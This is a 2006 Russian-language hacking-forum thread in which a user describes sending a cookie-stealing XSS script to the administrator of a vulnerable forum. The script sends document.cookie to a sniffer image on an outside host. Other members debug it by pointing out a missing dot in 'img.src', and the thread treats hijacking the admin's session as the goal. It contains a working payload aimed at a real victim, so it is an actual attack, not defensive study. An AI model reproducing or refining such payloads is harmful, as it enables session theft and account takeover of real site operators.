Вопрос по организации XSS атаки, на уязвимом форуме..

Discussion in 'Песочница' started by a1nt, 9 Jul 2006.

  1. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    Нашел уязвимый форум, где можно вставить
    Code:
    <script></script>
    . Чтобы забрать cookies админа отправил ему сообщение
    Code:
    <script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
    Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?
     
    #1 a1nt, 9 Jul 2006
  2. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.
     
    #2 Azazel, 9 Jul 2006
  3. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция
    Code:
    <script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
    Не работает на моем компьютере.
     
    #3 a1nt, 9 Jul 2006
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Найди отличие
     
    #4 FQziT, 9 Jul 2006
  5. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    я помогу.

     
    #5 Dracula4ever, 9 Jul 2006
  6. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    точку забыл!
     
    #6 D1mOn, 9 Jul 2006
    1 person likes this.
  7. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    a1nt, это приватная инфа - в паблике нету...
     
    #7 podkashey, 9 Jul 2006
    1 person likes this.
  8. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    dracula4ever, D1mOn: Пять за сообразительность :)
     
    #8 FQziT, 9 Jul 2006
    1 person likes this.
  9. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.
     
    #9 a1nt, 9 Jul 2006
    1 person likes this.
(You must log in or sign up to post here.)
Loading...
Similar Threads - Вопрос организации атаки
  1. gilo20

    Вопрос по шеллу

    gilo20, 26 Feb 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,473
    crlf
    27 Feb 2023
  2. Dobi768

    Вопрос про nmap ssh-hostkey

    Dobi768, 14 Jan 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,396
    Dobi768
    14 Jan 2023
  3. avva99on

    Вопрос по движку UMI.CMS

    avva99on, 15 Dec 2022, in forum: Песочница
    Replies:
    0
    Views:
    2,395
    avva99on
    15 Dec 2022
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.